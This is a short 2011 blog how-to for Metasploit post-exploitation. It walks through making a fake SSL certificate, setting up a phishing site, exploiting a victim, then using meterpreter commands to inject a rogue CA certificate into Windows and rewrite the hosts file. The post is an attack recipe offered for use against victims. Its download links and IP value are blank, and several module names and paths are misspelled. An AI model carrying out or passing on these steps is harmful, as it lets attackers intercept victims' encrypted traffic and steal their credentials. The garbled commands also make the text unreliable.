Sep 25, 2011

Howto: Metasploit Post Exploitation With Inject CA

1. Create the certificate with impersonation-ssl module
 you can download the module from

2. Create phishing site with fake SSL certificate.

3. Get the injection module from

4. Go to Metasploit and exploit the victim.

5. When you get the meterpreter shell, use

  meterpreter> background
  meterpreter> use auxialiary/windows/ca/myca
  meterpreter> set COMMAND inject_ca
  meterpreter> CAFILE=/root/.msf4/loot/yourfakekey.pem

  run post/windows/manage/myca COMMAND=inject_ca CAFILE=/root/.msf4/loot/youfakekey.pem

6. Inject the hostname into C:/Windows/system32/driver/etc/hosts with
  you can edit it with the shell

  run post/windows/manage/myca COMMAND=inject_host IP=

 If you like my blog, Please Donate Me

No comments: